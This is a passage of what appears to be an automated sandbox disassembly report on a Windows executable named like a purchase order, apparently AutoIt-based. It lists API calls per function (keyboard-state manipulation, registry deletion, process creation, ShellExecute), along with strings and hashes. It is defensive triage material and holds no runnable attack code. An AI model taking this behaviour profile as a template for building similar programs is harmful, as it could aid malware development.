                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                      • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                    • _wcstok.LIBCMT ref: 00501D6E
                                                    • _wcscpy.LIBCMT ref: 00501DFD
                                                    • _memset.LIBCMT ref: 00501E30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X$t:Vp:V
                                                    • API String ID: 774024439-3188185075
                                                    • Opcode ID: 642cdddc0c014b93f8cabe59e52b7497b86c3e9e3b53c403a9ff2a80d7281ad5
                                                    • Instruction ID: fe4aa5e030cedfff2bf78e06f33212750797675830eeb5f7343cf751b82de45c
                                                    • Opcode Fuzzy Hash: 642cdddc0c014b93f8cabe59e52b7497b86c3e9e3b53c403a9ff2a80d7281ad5
                                                    • Instruction Fuzzy Hash: F4C182355087019FC314EF25C881A9EBBE4FF85314F00496EF89A972A2DB34ED05CBA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d6c13809a69d485a9264ca59fae67ba5c9f2f937ebcddb7d64337b968c9f3f1
                                                    • Instruction ID: 5031b81a3c7c5d7f33048ffa29b9daaae25c2013eba8242a485797ad78a122fc
                                                    • Opcode Fuzzy Hash: 5d6c13809a69d485a9264ca59fae67ba5c9f2f937ebcddb7d64337b968c9f3f1
                                                    • Instruction Fuzzy Hash: 4B716D75904109FFCB08CF98DC89EAEBB78FF85318F14815EF915A6251C7349A12CBA8
                                                    APIs
                                                    • _memset.LIBCMT ref: 0051214B
                                                    • _memset.LIBCMT ref: 00512214
                                                    • ShellExecuteExW.SHELL32(?), ref: 00512259
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                      • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00512320
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0051232F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 4082843840-2766056989
                                                    • Opcode ID: 045128b422b001b3bfad202e124fc326cbd80567c6360c3d86057d1fdce94973
                                                    • Instruction ID: 36c53da3840b48fbbf1e30e4b8688e382f8a07e7b9ddc6364da5446b185cd1ed
                                                    • Opcode Fuzzy Hash: 045128b422b001b3bfad202e124fc326cbd80567c6360c3d86057d1fdce94973
                                                    • Instruction Fuzzy Hash: AA718B74A00619AFCB04EFA5C8919DEBBF5FF48314F00845EE856AB351DB34AD90CB94
                                                    APIs
                                                    • GetParent.USER32(?), ref: 004F481D
                                                    • GetKeyboardState.USER32(?), ref: 004F4832
                                                    • SetKeyboardState.USER32(?), ref: 004F4893
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004F48C1
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004F48E0
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 004F4926
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004F4949
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 474bd004dcf7391843d27fbe55a7be4495f9418b66fc2566a728a7e675570c42
                                                    • Instruction ID: 4f18ad4d3d56e3a2f9621ac4ae50685539b702ee4286077e3d41c9e41c450006
                                                    • Opcode Fuzzy Hash: 474bd004dcf7391843d27fbe55a7be4495f9418b66fc2566a728a7e675570c42
                                                    • Instruction Fuzzy Hash: 7251E5A06087D93DFB3652348C05FBB7EA95B86344F08858AE3D5469C3CADCEC88D764
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 004F4638
                                                    • GetKeyboardState.USER32(?), ref: 004F464D
                                                    • SetKeyboardState.USER32(?), ref: 004F46AE
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004F46DA
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004F46F7
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004F473B
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004F475C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 77cf80bdf8e64910face753162a5f00122a25d9f275056bf24f21736315dd743
                                                    • Instruction ID: 7495a74c62d22dcddc44920eb24e5b9345094dec13c0394c4d6ab8b86949283b
                                                    • Opcode Fuzzy Hash: 77cf80bdf8e64910face753162a5f00122a25d9f275056bf24f21736315dd743
                                                    • Instruction Fuzzy Hash: 775108A05047D93DFB3657248C45B77BFE99B86304F08448AE2D486AC2DB9CEC98D768
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: a3c6430157660939f88053500201a75d98d8f4a9004f49db0c80faf002e16dd5
                                                    • Instruction ID: 46ac5b1429e79ce5222b88d45555d428a6666edce3be2a6740618bc869e6dd10
                                                    • Opcode Fuzzy Hash: a3c6430157660939f88053500201a75d98d8f4a9004f49db0c80faf002e16dd5
                                                    • Instruction Fuzzy Hash: 4C418E65C1021875CF11FBA58C86ACFB7ACEF15314F50846BFA14F3221EA78E65187A9
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00513C92
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00513CBC
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00513D71
                                                      • Part of subcall function 00513C63: RegCloseKey.ADVAPI32(?), ref: 00513CD9
                                                      • Part of subcall function 00513C63: FreeLibrary.KERNEL32(?), ref: 00513D2B
                                                      • Part of subcall function 00513C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00513D4E
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00513D16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 030ae1e96fc0eb4d704760fe33873fa75c60340ecff7250f2d8f29cb5c86078a
                                                    • Instruction ID: 90d00dbef1f258d356bb83044a5af6c0d36d00cfcb0613de627d91ac8eb681bb
                                                    • Opcode Fuzzy Hash: 030ae1e96fc0eb4d704760fe33873fa75c60340ecff7250f2d8f29cb5c86078a
                                                    • Instruction Fuzzy Hash: B3310FB1901109BFEB159B94EC99EFEBBBCFF18344F000569E512A2150E6709F89DBB0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00518DF4
                                                    • GetWindowLongW.USER32(00D6A7C8,000000F0), ref: 00518E27
                                                    • GetWindowLongW.USER32(00D6A7C8,000000F0), ref: 00518E5C
                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00518E8E
                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00518EB8
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00518EC9
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00518EE3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: 755afdfe7a4de79dcdea76b425785f4ed537725421fade39ba667a51d2873ed3
                                                    • Instruction ID: 5c61b17186be2adace49c901014454a938e3a5958bce6379b5e6a6acd1fa3f33
                                                    • Opcode Fuzzy Hash: 755afdfe7a4de79dcdea76b425785f4ed537725421fade39ba667a51d2873ed3
                                                    • Instruction Fuzzy Hash: 63313431600611AFEB20DF58EC85FA53BB9FB5A314F184264F5158B2B2CF71A884EB51
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F1734
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F175A
                                                    • SysAllocString.OLEAUT32(00000000), ref: 004F175D
                                                    • SysAllocString.OLEAUT32(?), ref: 004F177B
                                                    • SysFreeString.OLEAUT32(?), ref: 004F1784
                                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 004F17A9
                                                    • SysAllocString.OLEAUT32(?), ref: 004F17B7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: e209ad801ff50754a873404e80f67807b8631f34bc248cce8fe949162b0a587e
                                                    • Instruction ID: 2fadea502ceb8eb04a722a8b72cc972007782aeb19e3b2fd8f9b7605f0851af9
                                                    • Opcode Fuzzy Hash: e209ad801ff50754a873404e80f67807b8631f34bc248cce8fe949162b0a587e
                                                    • Instruction Fuzzy Hash: 3D215175600219AF9B10EBA9DC88DBF73FCEB09360B408126FA19DB360D674EC459764
                                                    APIs
                                                      • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 004F6A2B
                                                    • _wcscmp.LIBCMT ref: 004F6A49
                                                    • MoveFileW.KERNEL32(?,?), ref: 004F6A62
                                                      • Part of subcall function 004F6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 004F6DBA
                                                      • Part of subcall function 004F6D6D: GetLastError.KERNEL32 ref: 004F6DC5
                                                      • Part of subcall function 004F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6DD9
                                                    • _wcscat.LIBCMT ref: 004F6AA4
                                                    • SHFileOperationW.SHELL32(?), ref: 004F6B0C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2323102230-1173974218
                                                    • Opcode ID: 5e39b6efbbbe4cf561436e3f15899c614e376b6189b7314fd7718f1bb24539a1
                                                    • Instruction ID: b8934dcb58b9fc261e35234c234f7cbfd861e7d1f9d49cb11c1eefe7682d87a8
                                                    • Opcode Fuzzy Hash: 5e39b6efbbbe4cf561436e3f15899c614e376b6189b7314fd7718f1bb24539a1
                                                    • Instruction Fuzzy Hash: EF313571C0021C6ACF50EFA4D845AEEB7B89F08304F5045DBE605E3251EB399B49CB68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: ab8b1e33255d9e086d1cfb5ad8cf0d0a2ba90f2c23537be101c7ba5b2786917b
                                                    • Instruction ID: f8d8df30d326bfea62dea793448596f8f09991bbd9e5d3afc96de2e095a0420a
                                                    • Opcode Fuzzy Hash: ab8b1e33255d9e086d1cfb5ad8cf0d0a2ba90f2c23537be101c7ba5b2786917b
                                                    • Instruction Fuzzy Hash: 74213A311045197AD230AA359D02FBB73A8AF55319F10402FFA4587389EFDD9E82D2AD
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F180D
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F1833
                                                    • SysAllocString.OLEAUT32(00000000), ref: 004F1836
                                                    • SysAllocString.OLEAUT32 ref: 004F1857
                                                    • SysFreeString.OLEAUT32 ref: 004F1860
                                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 004F187A
                                                    • SysAllocString.OLEAUT32(?), ref: 004F1888
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 5ea630d3b666acfff71d72f6c57bda7dd043e3dfc7515841158f8497b6f7f10c
                                                    • Instruction ID: b20d40db1a4df0f0a9af34a066665c2b70c71747ed0d0f195d4031b59e22ccb7
                                                    • Opcode Fuzzy Hash: 5ea630d3b666acfff71d72f6c57bda7dd043e3dfc7515841158f8497b6f7f10c
                                                    • Instruction Fuzzy Hash: A0217435600208AFDB10ABA9DC88DBFB7FCEB093A0B408126FA15DB360D674EC459764
                                                    APIs
                                                      • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                      • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                      • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0051A13B
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0051A148
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0051A153
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0051A162
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0051A16E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 99d3d113c85cf7a4a82e48ec40efe2b7a6b48a109cc43229be36cc2081b1c60a
                                                    • Instruction ID: 85cf1029a4286a69af21a40f33c812d45be0f56bef466f88ac436e96a1710642
                                                    • Opcode Fuzzy Hash: 99d3d113c85cf7a4a82e48ec40efe2b7a6b48a109cc43229be36cc2081b1c60a
                                                    • Instruction Fuzzy Hash: FD118EB1150219BEEF114F65CC86EE77F6DFF08798F014215FA08A60A0C7769C61DBA4
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 004D4C3E
                                                      • Part of subcall function 004D86B5: GetLastError.KERNEL32(?,004D0127,004D88A3,004D4673,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D86B7
                                                      • Part of subcall function 004D86B5: __calloc_crt.LIBCMT ref: 004D86D8
                                                      • Part of subcall function 004D86B5: GetCurrentThreadId.KERNEL32 ref: 004D8701
                                                      • Part of subcall function 004D86B5: SetLastError.KERNEL32(00000000,004D0127,004D88A3,004D4673,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D8719
                                                    • CloseHandle.KERNEL32(?,?,004D4C1D), ref: 004D4C52
                                                    • __freeptd.LIBCMT ref: 004D4C59
                                                    • RtlExitUserThread.NTDLL(00000000,?,004D4C1D), ref: 004D4C61
                                                    • GetLastError.KERNEL32(?,?,004D4C1D), ref: 004D4C91
                                                    • RtlExitUserThread.NTDLL(00000000,?,?,004D4C1D), ref: 004D4C98
                                                    • __freefls@4.LIBCMT ref: 004D4CB4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1445074172-0
                                                    • Opcode ID: a631a3dbe2a9701184f8331558a85b287a7749b1e6aef838794c2ea07e1d508f
                                                    • Instruction ID: c3f0326f9fd6a0ea7737a821a5d19afae272f3faf6f84eec7b7d46de2cb0f237
                                                    • Opcode Fuzzy Hash: a631a3dbe2a9701184f8331558a85b287a7749b1e6aef838794c2ea07e1d508f
                                                    • Instruction Fuzzy Hash: CF01D470401601AFC718BB75E92992E77B5EF54718710851FF4098B352EF3DD8468A69
                                                    APIs
                                                    • _memset.LIBCMT ref: 0051E14D
                                                    • _memset.LIBCMT ref: 0051E15C
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00573EE0,00573F24), ref: 0051E18B
                                                    • CloseHandle.KERNEL32 ref: 0051E19D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID: $?W$>W
                                                    • API String ID: 3277943733-2305796706
                                                    • Opcode ID: 005e39c4e535fe7dcc544275018a18908c24f230ecafddf98638de40ff020d09
                                                    • Instruction ID: 7ec5c0e2da16911bf0b00b020667609913f0224c46cb35a91b14d0717aded148
                                                    • Opcode Fuzzy Hash: 005e39c4e535fe7dcc544275018a18908c24f230ecafddf98638de40ff020d09
                                                    • Instruction Fuzzy Hash: 4EF030F1940310BAF3106B65BC16F777AACEB153A4F004421FE08D52A1D2BA4E54F6B9
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004CC6C0
                                                    • GetWindowRect.USER32(?,?), ref: 004CC701
                                                    • ScreenToClient.USER32(?,?), ref: 004CC729
                                                    • GetClientRect.USER32(?,?), ref: 004CC856
                                                    • GetWindowRect.USER32(?,?), ref: 004CC86F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: Rect$Client$Window$Screen
                                                    • String ID:
                                                    • API String ID: 1296646539-0
                                                    • Opcode ID: 330fbf6d516446e71de442bfc92dafb71151862e586635cf1edcf4686dba4628
                                                    • Instruction ID: f0e8ddc13f7a4569134f7607266501a819215f1e209eabdc556f42abff2c873f
                                                    • Opcode Fuzzy Hash: 330fbf6d516446e71de442bfc92dafb71151862e586635cf1edcf4686dba4628
                                                    • Instruction Fuzzy Hash: DBB15E7990024ADBDF50CFA8C580BEEBBB1FF08310F14952AEC59DB254DB34A941DB69
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: a6596f675ec6b40a5928b08ee159ca7fe485536372524fd3a225e8330faaf814
                                                    • Instruction ID: 0a1810820ef45f6e83d32352d29605bd23edb81ed51495a415058847e285608d
                                                    • Opcode Fuzzy Hash: a6596f675ec6b40a5928b08ee159ca7fe485536372524fd3a225e8330faaf814
                                                    • Instruction Fuzzy Hash: FE617F3050025E9BDB01EF66CC81FFE77A9AF44308F04445EF9555B292EB39AD05CB69
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512FA0
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00512FE0
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00513003
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0051302C
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0051306F
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0051307C
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: a18a66cfe85c79658f8e934401d6e7fec2fabcac15eb77018e59fb0bb3fddc0f
                                                    • Instruction ID: ce0290f9d0c8dd88b20387a597c2dc048fe58fac0b81dd6e402a1961ace88512
                                                    • Opcode Fuzzy Hash: a18a66cfe85c79658f8e934401d6e7fec2fabcac15eb77018e59fb0bb3fddc0f
                                                    • Instruction Fuzzy Hash: 23519C31108200AFD704EF65C895EAEBBF9FF88708F04481EF585872A1EB75E955DB62
                                                    APIs
                                                    Similarity
                                                    • API ID: _wcscpy$_wcscat
                                                    • String ID:
                                                    • API String ID: 2037614760-0
                                                    • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                    • Instruction ID: 7937496c4293db010549e46e08b51f924a4bed2734a37bb43fdbc1528cb0d048
                                                    • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                    • Instruction Fuzzy Hash: 08510078D00115AACB51AF99C490EBEB7B0EF05314F50406FF981AB292DBBC5F82D799
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 004F2AF6
                                                    • VariantClear.OLEAUT32(00000013), ref: 004F2B68
                                                    • VariantClear.OLEAUT32(00000000), ref: 004F2BC3
                                                    • _memmove.LIBCMT ref: 004F2BED
                                                    • VariantClear.OLEAUT32(?), ref: 004F2C3A
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004F2C68
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: f55b4bf004f45d7d83c7a163b372b02e2f2a9b1bb242a4edad8d3818482efd97
                                                    • Instruction ID: 6975cc74dcef57d370c4218ce62fe3bd389cdea5771becee41b5db58082ba9ac
                                                    • Opcode Fuzzy Hash: f55b4bf004f45d7d83c7a163b372b02e2f2a9b1bb242a4edad8d3818482efd97
                                                    • Instruction Fuzzy Hash: 91517EB5A00209EFDB14CF58C880AAAB7B8FF4C314B15855AEE49DB310E374E951CFA4
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 0051833D
                                                    • GetMenuItemCount.USER32(00000000), ref: 00518374
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0051839C
